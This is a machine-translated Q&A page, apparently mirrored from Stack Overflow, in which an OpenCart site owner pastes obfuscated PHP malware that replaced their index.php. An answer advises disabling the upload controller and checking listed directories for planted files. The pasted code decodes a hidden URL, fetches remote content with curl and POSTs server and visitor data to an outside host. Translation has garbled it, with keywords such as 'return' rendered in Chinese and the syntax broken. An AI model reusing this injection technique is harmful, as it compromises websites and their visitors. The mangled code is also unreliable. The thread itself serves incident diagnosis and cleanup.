簡體   English   中英

Opencart index.php 文件損壞

[英]Opencart index.php file corruption

我正在使用 opencart v3.0.2.0,問題是我的 opencart 網站的入口點 opencart 的 index.php 文件上傳到 public_html 目錄損壞(index.php 文件中的代碼更改為奇怪的字符). 上周發生了兩次。 我不知道有人在入侵或我的域或代碼有問題。 如果有人可以幫助或指導我,請告訴我。 謝謝你。

損壞后的 index.php 文件:

全局$O; $O=urldecode($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9].$O[62].$ O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65].$O[67].$O[ 71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O[67].$O[65] .$O[63].$oOooOO.$O[63]; function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){$ooooOOOooOo=curl_init();curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec( $ooooOOOooOo);curl_close($ooooOOOooOo);返回 $oooooOOOOooO; ” $OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooooO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO, CURLOPT_POSTFIELDS, http_build_query($OOOoooo));$OOOOooo=curl_exec($OOooooO);$OOOOoooOO=curl_errno($OOooooO);curl_close($OOooooO);如果(0;==$OOOOoooo){返回假;}返回$OOOOoooo ;} function oooOOOo($ooOOo){global $O;$ooOOOOo = false.$oooooOOo = $O[14].$O[8].$O[8].$O[14].$O[18] .$O[2].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O[8].$ O[14].$O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8].$O[ 8].$O[90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10].$O[8] ;$O[18],if ($ooOOo;=''){if (preg_match("/($ooooOOo)/si";$ooOOo)){$ooOOOOo=true;}}返回 $ooOOOOo;} function ooooOOooOOoOO ($oOOOOOOoOOOO){全局 $O.$ooOOOOOOoO=false.$ooOOOOOOoOo=$O[14].$O[8].$O[ 8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[59].$O[16] .$O[9].$O[90].$O[5].$O[10].$O[15].$O[8].$O[8].$O[59].$ O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[14].$O[8].$O[ 8].$O[14].$O[18].$O[2].$O[59].$O[21];$O[8],$O[25];if ($oOOOOOOoOOOO; ='' && preg_match("/($ooOOOOOOoOo)/si". $oOOOOOOoOOOO)) {$ooOOOOOOoO=true.}返回 $ooOOOOOOoO.}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[35]. $O[37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35]?$O[37]].==$O[8]. $O[13].$O[13]).$O[15].$O[4].$O[4].$O[9]:$O[11].$O[62].$ O[63].$O[63].$O[15].$O[4].$O[4];$O[9].$O[62].$O[63].$O[ 63]).$oOoooOOoOO=$_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30 ];$O[52].$O[32].$O[29].$O[33].$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O[30] .$O[35].$O[52];$O[41].$O[34].$O[37].$O[30].$ooOOOoooOOoOO=$_SERVER[$O[35]. $O[41].$O[35].$O[52];$O[37].$O[28].$O[44].$O[39].$ooOOOOoooOOOoOO=$_SERVER[$ O[37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52];$O[50].$O[ 36].$O[51];$O[28].$ooOOOOoooOOOOoOO=$oooOOoOO.$ooOOooooOOoOO.$oooooOOoOO.$oooOOOOooooOOOooOO=$oOooOOoO.$O[63].$O[7].$O[24 .$O[12].$O[10].$O[4].$O[10];$O[59].$O[9].$O[15].$O[9]。 $ooooOOOOooooOOOooO=$oooOOoO.$O[63].$O[25].$O[10].$O[9];$O[59].$O[9].$O[15].$O [9].$ooooOOOOooooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9];$O[59].$O[9 .$O[15].$O[9].$ooooooOOo ooOOOooooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[12].$O[11].$O

是的,你說得對。 有人入侵您的商店並上傳病毒。 請檢查存儲上傳目錄storage/download可能是你有奇怪的文件,如6234sdhsd.ocmod.zip或類似的東西。

我確定病毒是由catalog/controller/tool/upload.php文件上傳的。 因此,如果您不需要這個 function,您可以注釋所有這些邏輯並返回空的 json 答案,例如:

$json = '';
$this->response->addHeader('Content-Type: application/json');
$this->response->setOutput(json_encode($json));

在該操作之后,您必須刪除帶有加密主體的奇怪文件,例如 images.php\bbfcode.php。

檢查所有這些路徑:

  • 管理員/(語言/控制器)
  • 目錄/(語言/控制器)
  • system/(所有修改,如果你有 ocmod.xml)
  • 系統/庫

檢查所有這些路徑。 如果您有備份,比較文件就不會那么困難。

暫無
暫無

聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.

 
粵ICP備18138465號  © 2020-2024 STACKOOM.COM